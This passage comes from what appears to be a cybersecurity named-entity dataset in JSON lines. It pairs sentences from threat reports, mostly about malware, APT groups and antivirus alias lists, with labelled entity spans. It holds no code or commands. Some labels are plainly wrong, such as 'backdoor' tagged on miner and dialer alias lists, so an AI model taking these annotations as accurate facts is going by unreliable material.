known as: W32.MasiveNV.Trojan Trojan.Krap Win32.Worm.Mira.a W32.SillyFDC Packed.Win32.Krap.jc Trojan.Win32.Krap.evgeam Worm.Win32.Mira.AA Trojan.MulDrop5.32888 Trojan.Win32.Heur Trojan[Packed]/Win32.Krap Trojan:Win32/Skeeyah.A!rfn Packed.Win32.Krap.jc HEUR/Fakon.mwf Worm.Win32.Mira.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000669", "source": "cyner2_valid"}} {"text": "Rock then deletes shadow copies and disables system restore.", "spans": {"Malware: Rock": [[0, 4]]}, "info": {"id": "cyner2_valid_000670", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O Trojan.Malamaged Trojan/Spy.Montp.we Backdoor.Graybird Win.Spyware.18090-1 Trojan.Win32.Dnfse.cudocq Backdoor.Win32.GrayBird.4098462 Backdoor.Win32.Pigeon.~VF Trojan.QQPass.Win32.523 BehavesLike.Win32.BadFile.gh Backdoor.Pigeon BDS/Pigeon.DTQ.12 TrojanSpy.Montp Trj/CI.A Trojan.Malamaged!HSrWyLJr12c Win32/Backdoor.085", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000672", "source": "cyner2_valid"}} {"text": "However, since then we have released more than a dozen detailed posts on Pawn Storm.", "spans": {}, "info": {"id": "cyner2_valid_000673", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Sputnik.D TROJ_PSUTNIK.SM TrojWare.Win32.Kryptik.ANIS TROJ_PSUTNIK.SM Backdoor:Win32/Tarctox.B Backdoor.Rocra Backdoor.Tarctox!4EC5 Trojan.Crypt W32/Kryptik.APOJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000674", "source": "cyner2_valid"}} {"text": "The Turla espionage group has been targeting various institutions for many years.", "spans": {"Organization: institutions": [[53, 65]]}, "info": {"id": "cyner2_valid_000675", "source": "cyner2_valid"}} {"text": "This mandatory policy has become one of the most important mechanisms in the iOS security ecosystem to ensure the privacy and security of iOS users.", "spans": {"System: iOS security ecosystem": [[77, 99]], "Organization: iOS 
users.": [[138, 148]]}, "info": {"id": "cyner2_valid_000676", "source": "cyner2_valid"}} {"text": "The functionality for these two parts is implemented by doInBackground and onPostExecute respectively , two API methods of “ android.os.AsyncTask ” as extended by class “ org.starsizew.i ” .", "spans": {}, "info": {"id": "cyner2_valid_000678", "source": "cyner2_valid"}} {"text": "Hamas is not widely known for having a sophisticated mobile capability , which makes it unlikely they are directly responsible for ViperRAT .", "spans": {"Organization: Hamas": [[0, 5]], "Malware: ViperRAT": [[131, 139]]}, "info": {"id": "cyner2_valid_000679", "source": "cyner2_valid"}} {"text": "Its code contains a reference to Sauron, the all-seeing antagonist in Lord of the Rings.", "spans": {}, "info": {"id": "cyner2_valid_000681", "source": "cyner2_valid"}} {"text": "By doing so , attackers can easily set up the Trojan to communicate back to them without any need for high-end servers .", "spans": {}, "info": {"id": "cyner2_valid_000682", "source": "cyner2_valid"}} {"text": "It specifically targets two of the largest online poker sites: PokerStars and Full Tilt Poker.", "spans": {}, "info": {"id": "cyner2_valid_000684", "source": "cyner2_valid"}} {"text": "All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect .", "spans": {"System: Google Play Protect": [[82, 101]]}, "info": {"id": "cyner2_valid_000685", "source": "cyner2_valid"}} {"text": "In Asia there are numerous companies producing Android-based devices and Android apps , and many of them offer users their own app stores containing programs that can not be found in Google Play .", "spans": {"System: Android-based": [[47, 60]], "System: Android": [[73, 80]], "System: Google Play": [[183, 194]]}, "info": {"id": "cyner2_valid_000686", "source": "cyner2_valid"}} {"text": "Two years back , in the month of March we reported , NQ Mobile Security Research Center uncovered the world 's first 
Android bootkit malware called 'DKFBootKit ' , that replaces certain boot processes and can begin running even before the system is completely booted up .", "spans": {"Organization: NQ Mobile Security": [[53, 71]], "System: Android": [[117, 124]]}, "info": {"id": "cyner2_valid_000687", "source": "cyner2_valid"}} {"text": "Each bitmap resource is extracted , stripped of the first 0x428 bytes ( BMP headers and garbage data ) , and combined into one file .", "spans": {}, "info": {"id": "cyner2_valid_000688", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Plupay Win32.Trojan.WisdomEyes.16070401.9500.9995 Virus.W32.Virus!c Backdoor:MSIL/Plupay.A!bit Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000689", "source": "cyner2_valid"}} {"text": "Eventually we observed the agent exfiltrate the WiFi password from our test phone to the Command & Control server : Similarly , the agent also sent to the Command & Control the list of installed apps : This Command & Control seems to have been active since at least April 2017 and was registered impersonating the legitimate service AccuWeather .", "spans": {"System: AccuWeather": [[333, 344]]}, "info": {"id": "cyner2_valid_000691", "source": "cyner2_valid"}} {"text": "Bluecoat: As a part of the daily work process, I keep an eye on the latest incoming samples to ensure detection in our Malware Appliance.", "spans": {"Organization: Bluecoat:": [[0, 9]], "Malware: Malware Appliance.": [[119, 137]]}, "info": {"id": "cyner2_valid_000692", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Arefty Trojan:Win32/Arefty.B Trj/CI.A Trojan.Win32.Arefty", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000693", "source": "cyner2_valid"}} {"text": "The attacks have been carried out by means of well-drafted emails that were written in flawless Danish and that were sent to carefully selected targets.", "spans": {}, "info": {"id": 
"cyner2_valid_000694", "source": "cyner2_valid"}} {"text": "The malware creates an Intent inside the decryption function using the string value passed as the name for the Intent .", "spans": {}, "info": {"id": "cyner2_valid_000695", "source": "cyner2_valid"}} {"text": "Unit 42 has identified malware with recent compilation and distribution timestamps that has code, infrastructure, and themes overlapping with threats described previously in the Operation Blockbuster report, written by researchers at Novetta.", "spans": {"Organization: Unit 42": [[0, 7]], "Malware: malware": [[23, 30]], "System: infrastructure,": [[98, 113]], "Malware: threats": [[142, 149]], "Organization: researchers": [[219, 230]], "Organization: Novetta.": [[234, 242]]}, "info": {"id": "cyner2_valid_000696", "source": "cyner2_valid"}} {"text": "Attackers deliver the Trojan using generic Portuguese language phishing emails and are currently targeting seven Brazilian banks.", "spans": {"Malware: Trojan": [[22, 28]], "Organization: Brazilian banks.": [[113, 129]]}, "info": {"id": "cyner2_valid_000697", "source": "cyner2_valid"}} {"text": "PC malware first introduced this technique which is becoming a trend in mobile malware having been adopted by several malware families including Dendroid .", "spans": {"Malware: Dendroid": [[145, 153]]}, "info": {"id": "cyner2_valid_000698", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Hupigon.bkgjiq Backdoor.Graybird Trojan.Win32.Mepaow.moy Backdoor.Doumol!DIRtAUaekSk WIN.WORM.Virus Trojan/Mepaow.dg Win32.Troj.Mepaow.kcloud Backdoor:Win32/Doumol.A Trojan/Win32.Mepaow Backdoor.Graybird!rem VirTool.Win32.DelfInject Delf.PTD Trj/Keylog.LH", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000701", "source": "cyner2_valid"}} {"text": "APT29 has used The Onion Router TOR and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS.", 
"spans": {"System: The Onion Router TOR": [[15, 35]], "System: the TOR domain": [[40, 54]], "Malware: plugin meek": [[64, 75]], "System: encrypted network tunnel": [[96, 120]], "System: Google services over TLS.": [[149, 174]]}, "info": {"id": "cyner2_valid_000702", "source": "cyner2_valid"}} {"text": "This means that in the future, the threat actor can change or add other processes or targets.", "spans": {}, "info": {"id": "cyner2_valid_000703", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.ScriptKD.6954 Risktool.Bitcoinminer Trojan.ScriptKD.6954 Trojan.ScriptKD.6954 Trojan.ScriptKD.D1B2A Coinmin.CB2FB968 W32/Rasftuby.A Coinmin.CB2FB968 Trojan.Win64.Miner.eurebl Trojan.ScriptKD.6954 Trojan.BtcMine.1713 BehavesLike.Win32.HTool.hc PUA.CoinMiner W32/Trojan.WNJU-7839 RiskTool.BitCoinMiner.fog PUA/BitCoinMiner.N RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win64/CoinMiner.PA RiskWare.BitCoinMiner Trj/CI.A Trojan.Miner!QERlh7+J44U Win32/Trojan.Script.6ae", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000704", "source": "cyner2_valid"}} {"text": "Also known as Snake or Uroburos, names which come from its top class rootkit, the Turla cyber-espionage group has been active for more than 8 years.", "spans": {"Malware: rootkit,": [[69, 77]]}, "info": {"id": "cyner2_valid_000706", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Lastad.49152.C Trojan/Downloader.Lastad.d Trojan.Win32.Lastad.djar W32/Downloader.NZ TROJ_NDWARE.A Trojan.Downloader.Small-175 Trojan-Downloader.Win32.Lastad.d Troj.Downloader.W32.Lastad.d!c TrojWare.Win32.TrojanDownloader.Lastad.d Trojan.DownLoader.1037 Downloader.Lastad.Win32.21 TROJ_NDWARE.A BehavesLike.Win32.Downloader.pm W32/Downloader.WEKO-9166 TrojanDownloader.Lastad.g TR/Dldr.Small.RN.1 Trojan[Downloader]/Win32.Lastad Win-Trojan/Lastad.49152.C TrojanDownloader:Win32/Lastad.D Win32/Lastad.B Trojan.Win32.Lastad.d Trojan-Downloader.Win32.Lastad 
Downloader.Lastad.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000707", "source": "cyner2_valid"}} {"text": "RuMMS Samples , C2 , Hosting Sites , Infections and Timeline In total we captured 297 RuMMS samples , all of which attempt to contact an initial C2 server that we extracted from the app package .", "spans": {"Malware: RuMMS": [[0, 5], [86, 91]]}, "info": {"id": "cyner2_valid_000708", "source": "cyner2_valid"}} {"text": "Since the year before last March 2021, malware of the Lazarus attack group has been found in a number of companies, including domestic defense, satellite, software, and media companies, so ASEC AhnLab Security Emergency Response Center is Malicious code is continuously tracked and analyzed", "spans": {"Malware: malware": [[39, 46]], "Organization: companies,": [[105, 115]], "Organization: domestic defense, satellite, software,": [[126, 164]], "Organization: media companies,": [[169, 185]], "Organization: ASEC AhnLab Security Emergency Response Center": [[189, 235]]}, "info": {"id": "cyner2_valid_000709", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.MyShellHA.Worm Backdoor.Winterlove.D Backdoor.Winterlove.D Backdoor/WinterLove.d Backdoor.Winterlove.D W32/WinterLove.XWGQ-2895 Backdoor.Trojan TROJ_SPNR.35CC13 Win.Trojan.Winterlove-66 Backdoor.Win32.WinterLove.d Trojan.Win32.WinterLove.ejoo Backdoor.Win32.A.WinterLove.78364[h] Backdoor.Winterlove.D Backdoor.Winterlove.D BackDoor.Plunix Backdoor.WinterLove.Win32.62 TROJ_SPNR.35CC13 BehavesLike.Win32.AdwareRugo.lm W32/WinterLove.U@bd Backdoor/Winterlove.11 W32/Heuri.E!tr.bdr Trojan[Backdoor]/Win32.WinterLove Backdoor.Winterlove.D Backdoor.W32.WinterLove.d!c Win-Trojan/Winterlove.78364 Backdoor:Win32/Winterlove.D Backdoor.Winterlove.D Backdoor.WinterLove Win32.Backdoor.Winterlove.Eddq Backdoor.Win32.WinterLove Backdoor.Winterlove.D Backdoor.Win32.WinterLove.d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000710", 
"source": "cyner2_valid"}} {"text": "Following this theft, the actors covered their tracks by launching a destructive KillDisk variant which wiped over 9,000 computers and 500 Windows servers.", "spans": {"Malware: KillDisk variant": [[81, 97]], "System: 9,000 computers": [[115, 130]], "System: 500 Windows servers.": [[135, 155]]}, "info": {"id": "cyner2_valid_000711", "source": "cyner2_valid"}} {"text": "A backdoor targetting Linux also known as: Application.CoinMiner.AA Misc.Riskware.BitCoinMiner.Linux ELF_COINMINER.I Application.CoinMiner.AA not-a-virus:HEUR:RiskTool.AndroidOS.Miner.b Application.CoinMiner.AA Riskware.Unix.BitCoinMiner.ewuygp Linux.S.BitCoinMiner.820652 Application.CoinMiner.AA Application.CoinMiner.AA Tool.Linux.BtcMine.400 ELF_COINMINER.I RiskTool.Linux.od APPL/BitCoinMiner.rbpfo RiskWare[RiskTool]/Linux.BitCoinMiner.n Application.CoinMiner.AA Linux/Miner.820652 not-a-virus:HEUR:RiskTool.AndroidOS.Miner.b Trojan.RubyMiner Win32/Virus.RiskTool.42d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000712", "source": "cyner2_valid"}} {"text": "A backdoor also known as: MultiDropper.cfh Trojan/BHO.cecj Trojan.BHO.Win32.24353 Trojan/BHO.qkl Trojan.Graftor.D9C41 Trojan.Win32.A.BHO.111104.D Trojan/Win32.BHO.R33802 Trojan.BHO W32/BHO.NCU!tr Win32/Trojan.93b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000713", "source": "cyner2_valid"}} {"text": "We also connect one of the code signing certificates we observed to a campaign targeting gaming companies.", "spans": {}, "info": {"id": "cyner2_valid_000714", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.JorikVobfus.Trojan Trojan.Win32.Jorik.Vobfus!O Trojan.Jorik.Win32.113249 Trojan/Jorik.Vobfus.eznm Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Dwn.vzier Trojan.Win32.Z.Jorik.32768.AR Trojan.DownLoader25.46460 BehavesLike.Win32.Backdoor.nc Trojan.Win32.Jorik Trojan/Jorik.efzx Trojan/Win32.Vobfus 
TrojanDownloader:Win32/Bledox.B Trojan/Win32.Jorik.R33060 Trj/CI.A Win32.Trojan.Spnr.Ahom Trojan.Vobfus!8P/NLcybpCM Win32/Trojan.18e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000715", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Kelios.cdpjyc Trojan.DownLoader6.14598 BehavesLike.Win32.HLLPPhilis.vc TR/Kelios.2459909.1 Trojan.Kelios.1 Trojan:Win32/Loodir.A Backdoor.Win32.Morix PSW.OnlineGames4.LLY Win32/Trojan.4af", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000716", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Flooder.Win32.UDP!O Trojan.Black.Win32.12225 Win32.Trojan.WisdomEyes.16070401.9500.9702 W32/Teriyaki.A@bd Win.Trojan.Flooder-31 Flooder.Win32.UDP.21 Trojan.Win32.Flystud.dhag Trojan.Hookey Flooder.Win32 W32/Teriyaki.ALGH-8371 Flooder.UDP.j TR/QQFlood.wmfdp Flooder.Win32.UDP.21 Trojan/Win32.Flooder.R12225 Flooder.UDP Win32/Flooder.QQFlood.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000717", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Dropped:Backdoor.OnionDuke.A Trojan.Spy.Zbot Win32.Trojan.WisdomEyes.16070401.9500.9982 Win32/Tnega.MNdBdFB Dropped:Backdoor.OnionDuke.A Dropped:Backdoor.OnionDuke.A Riskware.Win32.Crypted.cstwha Trojan.Win32.Z.Onionduke.356049 Dropped:Backdoor.OnionDuke.A Trojan:W32/Sipuli.A BackDoor.OnionDuke.1 Trojan.Magania.Win32.64778 Trojan.Crypt3 AdWare/MSIL.po Pua.Premiuminstaller Backdoor.OnionDuke.A TrojanDropper:Win32/OnionDuke.A Dropped:Backdoor.OnionDuke.A Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000718", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Tompai.B Backdoor.Tompai.B Backdoor.Tompai.b.n3 Trojan.Win32.Tompai.ehjy W32/Tompai.B Backdoor.Trojan Tompai.AP VBS/Redlof.G WORM_TOMPAI.A Trojan.Tompai-1 Backdoor.Win32.Tompai.b Backdoor.Tompai.B Backdoor.Tompai!MrQm7vNkZGw Backdoor.Win32.Tompai.65024 
Virus.Win32.Heur.p Backdoor.Win32.Tompai.NAA Backdoor.Tompai.B BackDoor.Nightcraw BDS/Tompai.B WORM_TOMPAI.A Backdoor/Tompai.l Win32.Hack.Tompai.b.kcloud Backdoor:Win32/Tompai.E Backdoor.Tompai.B W32/Tompai.IXGF-2153 Trojan/Win32.HDC Backdoor.Tompai Backdoor.Trojan Win32/Tompai.NAA Backdoor.Win32.Tompai W32/Tompai.B!tr W32/Legwidan.A.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000719", "source": "cyner2_valid"}} {"text": "Check Point researchers have found a new variant of the HummingBad malware hidden in more than 20 apps on Google Play.", "spans": {"Organization: Check Point researchers": [[0, 23]], "Malware: HummingBad malware": [[56, 74]], "System: Google Play.": [[106, 118]]}, "info": {"id": "cyner2_valid_000720", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Application.Dialer.AXQ Trojan.Katusha.Win32.22016 DIAL_RAS.IO Win32.Trojan.WisdomEyes.16070401.9500.9691 DIAL_RAS.IO Win.Trojan.Dialer-736 not-a-virus:Porn-Dialer.Win32.Payer.a Application.Dialer.AXQ Riskware.Win32.Payer.udjsg Win32.Trojan.Dialer.Wsad Application.Dialer.AXQ Porn-Dialer.Payer.c GrayWare[Porn-Dialer]/Win32.Payer Trojan:Win32/RasDialer.O Application.Dialer.AXQ not-a-virus:Porn-Dialer.Win32.Payer.a Application.Dialer.AXQ Trojan/Win32.Dialer.R116531 Application.Dialer.AXQ Trojan.Win32.RasDialer.O", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000721", "source": "cyner2_valid"}} {"text": "The malware authors are leveraging Google Cloud Servers to host the initial Spy Banker Downloader Trojan, which is responsible for downloading and installing Spy Banker Trojan Telax.", "spans": {"System: Google Cloud Servers": [[35, 55]], "Malware: Spy Banker Downloader Trojan,": [[76, 105]], "Malware: Spy Banker Trojan Telax.": [[158, 182]]}, "info": {"id": "cyner2_valid_000722", "source": "cyner2_valid"}} {"text": "One of final payloads that is created by this dropper is an Uroburos variant used by the Turla group, which 
traditionally operates out of Russia.", "spans": {"Malware: final payloads": [[7, 21]], "Malware: dropper": [[46, 53]], "Malware: Uroburos variant": [[60, 76]]}, "info": {"id": "cyner2_valid_000723", "source": "cyner2_valid"}} {"text": "The analysis that follows is of completed, historical attacks as well as an extremely recent and ongoing attack, providing insight into the volume and timeline of infections, as well as a timeline for attacker-initiated actions using a novel malware family.", "spans": {}, "info": {"id": "cyner2_valid_000725", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Dropped:Trojan.Dropper.SGO Worm/W32.Gibon.78848.C Backdoor.Syrutrk.A2 Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/DldrX.CVLN BKDR_GIBON.SMA Dropped:Trojan.Dropper.SGO Trojan.Win32.Dropper.igzp Dropped:Trojan.Dropper.SGO Trojan.MulDrop.origin Backdoor.Win32.Syrutrk W32/Downloader.HIXV-3829 TR/Gibon.66560 Trojan[Downloader]/Win32.Murlo Backdoor:Win32/Syrutrk.A Trojan.Dropper.SGO Worm/Win32.Gibon.R3401 Dropped:Trojan.Dropper.SGO TrojanDownloader.Murlo Dropped:Trojan.Dropper.SGO Dropped:Trojan.Dropper.SGO W32/Bckdr.QUZ!tr Win32/Trojan.bc4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000726", "source": "cyner2_valid"}} {"text": "Over the past year, Talos has devoted a significant amount of time to better understanding how ransomware operates, its relation to other malware, and its economic impact.", "spans": {"Organization: Talos": [[20, 25]], "Malware: ransomware": [[95, 105]], "Malware: malware,": [[138, 146]]}, "info": {"id": "cyner2_valid_000728", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Zusy!O Trojan.Mediyes.B Rootkit.Win32.Mediyes.aag Trojan.NtRootKit.13221 Rootkit.Mediyes.ag Trojan/Win32.Unknown Trojan.Zusy.DD88 Rootkit.Win32.Mediyes.aag Backdoor/Win32.Mediyes.R23431 Rootkit.Mediyes Rootkit.Mediyes!tfGzm2Igz6k Rootkit.Win32.Mediyes", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_000730", "source": "cyner2_valid"}} {"text": "BEBLOH is also known for hiding in memory and creating a temporary new executable file upon shutdown, and deleting said file after re-infecting the system.", "spans": {"Malware: BEBLOH": [[0, 6]], "System: system.": [[148, 155]]}, "info": {"id": "cyner2_valid_000731", "source": "cyner2_valid"}} {"text": "What is Chrysaor ? Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks .", "spans": {"Malware: Chrysaor": [[8, 16], [19, 27]], "Organization: NSO Group Technologies": [[65, 87]]}, "info": {"id": "cyner2_valid_000732", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.VB.exowsu W32/Trojan.BLDI-5947 TrojanDownloader:VBS/Semicxer.A WM/Moat.B7D1D3FC!tr Win32/Trojan.940", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000733", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Mydoom.M@mm Worm/W32.Mydoom.87552 W32/Mydoom.O@MM MyDoom.L@mm Email-Worm.Win32.Mydoom.m Win32.Mydoom.M@mm I-Worm.Mydoom!W5qtz8CaGIM I-Worm.Win32.Mydoom.87552 Virus.Win32.Heur.c Win32.Mydoom.M@mm Win32.HLLM.MyDoom.54464 Heuristic.BehavesLike.Win32.ModifiedUPX.J Email-Worm.Win32.Mydoom!IK Worm/Mydoom.gz Worm.Mydoom.m.kcloud Win32.Mydoom.M@mm Win32/Mydoom.worm.87552 BScope.Malware-Cryptor.Win32.HZ4.12 Email-Worm.Mydoom Trojan.Win32.Dself.c Email-Worm.Win32.Mydoom W32/MyDoom.M@mm I-Worm/Mydoom.O W32/Mydoom.N.worm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000734", "source": "cyner2_valid"}} {"text": "When executed, these WSFs downloaded the Cerber crypto-ransomware.", "spans": {"Malware: the Cerber crypto-ransomware.": [[37, 66]]}, "info": {"id": "cyner2_valid_000735", "source": "cyner2_valid"}} {"text": "The file b0a365d0648612dfc33d88183ff7b0f0 was named GSB[.]doc which is short for Government Service Bus or in Arabic قناة التكامل 
الحكومية", "spans": {}, "info": {"id": "cyner2_valid_000736", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Buzy.D6BD Trojan.Win32.Z.Cyspetel.425984 TrojWare.Win32.Cyspetel.C Backdoor:Win32/Cyspetel.A W32/Cyspetel.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000737", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Clod971.Trojan.9196 Trojan.Downloader Trojan/Downloader.Small.pel Trojan.Win32.Chiviper.dcbav Adware.StartPage TROJ_SMALL.SMDA Trojan.DownLoader4.31050 TROJ_SMALL.SMDA Trojan[Downloader]/Win32.Small Win32.Hack.Huigezi.ec.kcloud Trojan:Win32/Chiviper.C Virus.Win32.Part.a Trojan.Win32.Swisyn Trojan.Win32.Small.PEL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000738", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Nebuler.dll Trojan.Nebuler.2 TROJ_NEBULER.SMK Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_NEBULER.SMK Trojan.Win32.Z.Nebuler.72704 Trojan.Mssmsgs.3845 Nebuler.dll Trojan.Win32.Nebuler Backdoor/WinUOJ.cqg Trojan:Win32/Paramis.A Trojan/Win32.Nebuler.R11854 SScope.Trojan.EIC.21905 Win32/Trojan.9ea", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000739", "source": "cyner2_valid"}} {"text": "The 24 target apps belong to 7 different Spanish banks : Caixa bank , Bankinter , Bankia , BBVA , EVO Banco , Kutxabank and Santander .", "spans": {"System: Caixa bank": [[57, 67]], "System: Bankinter": [[70, 79]], "System: Bankia": [[82, 88]], "System: BBVA": [[91, 95]], "System: EVO Banco": [[98, 107]], "System: Kutxabank": [[110, 119]], "System: Santander": [[124, 133]]}, "info": {"id": "cyner2_valid_000740", "source": "cyner2_valid"}} {"text": "Performing Man-in-the-Browser attacks", "spans": {}, "info": {"id": "cyner2_valid_000741", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.WNetRAT W32/Trojan.HHFH-1089 Trojan.Zusy.D38301 Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_valid_000743", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Nuker.NuKe.3.0 Trojan.Nuker.NuKe.3.0 Trojan.Nuker.NuKe.3.0 W32/Tool.WTQM-4805 HKTL_TSKNUKE.A Win.Trojan.N-85 Trojan.Nuker.NuKe.3.0 Exploit.Win32.Nuker.NuKe.30 Trojan.Nuker.NuKe.3.0 Exploit.Win32.Nuker-NuKe.htlk Trojan.Nuker.NuKe.3.0 Trojan.Nuker.NuKe.3.0 FDOS.Pili Tool.NuKe.Win32.1 HKTL_TSKNUKE.A Nuker.Win32.IceNuker W32/VirTool.KS Flooder.NuKe.30.b Trojan[Exploit]/Win32.Nuker Exploit.Win32.Nuker.NuKe.30 Exploit.Nuker.NuKe Win32/Nuker.NuKe.30 Win32.Exploit.Nuker.Pbyv", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000744", "source": "cyner2_valid"}} {"text": "As a case in point, we recently discovered a SPAM campaign targeting German-speaking users that involves a relatively new commercialized RAT called Ozone.", "spans": {"Organization: German-speaking users": [[69, 90]], "Malware: RAT": [[137, 140]], "Malware: Ozone.": [[148, 154]]}, "info": {"id": "cyner2_valid_000745", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Driveinfo.Worm Win32.Worm.AutoRun.LM Worm.Win32.Small!O Worm.Small Win32.Worm.AutoRun.LM W32/Small.i Win32.Worm.AutoRun.LM Win32.Trojan.WisdomEyes.16070401.9500.9640 W32/SillyWorm.VV W32.Resik.A Win32/Resik.A WORM_SMALL.BIX Win.Worm.Small-5683 Win32.Worm.AutoRun.LM Worm.Win32.Small.i Win32.Worm.AutoRun.LM Trojan.Win32.Small.yrjx Worm.Win32.Small.24576.C Win32.Worm.AutoRun.LM Win32.Worm.AutoRun.LM Win32.HLLW.Autoruner Worm.Small.Win32.41 WORM_SMALL.BIX W32/CWT.worm Worm.Win32.Small.i W32/Worm.SRZV-4847 Worm/Small.k WORM/Small.I.2 Worm/Win32.Small Worm.Win32.Small.i Worm/Win32.AutoRun.R25754 W32/CWT.worm Worm.Small Trj/VB.OO I-Worm.Small.NAL Win32/Small.NAL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000746", "source": "cyner2_valid"}} {"text": "Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same 
time.", "spans": {"Malware: Trochilus": [[9, 18]], "Malware: MoonWind RATs": [[23, 36]], "Vulnerability: compromised sites": [[61, 78]], "Organization: same organization": [[102, 119]]}, "info": {"id": "cyner2_valid_000747", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Downloader.JTZC Troj.Downloader.Script!c Trojan.Downloader.JTZC Trojan.Downloader.JTZC Trojan.Downloader.JTZC BehavesLike.Win32.BadFile.dh Trojan.Downloader.JTZC Script/Virus.435", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000749", "source": "cyner2_valid"}} {"text": "Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android .", "spans": {"System: Microsoft Defender": [[59, 77]], "System: Android": [[94, 101]]}, "info": {"id": "cyner2_valid_000750", "source": "cyner2_valid"}} {"text": "Kaspersky Lab has observed new waves of attacks that started on the 8th and the 27th of June 2016.", "spans": {"Organization: Kaspersky Lab": [[0, 13]]}, "info": {"id": "cyner2_valid_000751", "source": "cyner2_valid"}} {"text": "Their main infection vector is phishing e-mails, which", "spans": {"Malware: infection vector": [[11, 27]]}, "info": {"id": "cyner2_valid_000752", "source": "cyner2_valid"}} {"text": "All of these domains were registered by the same entity and they were resolving to the same IP.", "spans": {}, "info": {"id": "cyner2_valid_000753", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Centim.15872.AC Trojan/Downloader.Centim.ch Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Downloader.SZXX-8375 Downloader.Trojan Win.Downloader.Small-963 Trojan.Win32.Centim.ddia TrojWare.Win32.TrojanDownloader.Centim.~A Trojan.DownLoader.5835 Trojan-Downloader.Win32.Centim W32/DldrX.ORO TrojanDownloader.INService.tp W32.Trojan.Downloader-Daily-Wea Trojan[Downloader]/Win32.INService Trojan.Zusy.D331E Trojan/Win32.Xema.C27234 Win32.Trojan-downloader.Inservice.Tayl W32/Dowcen.DQ!tr", 
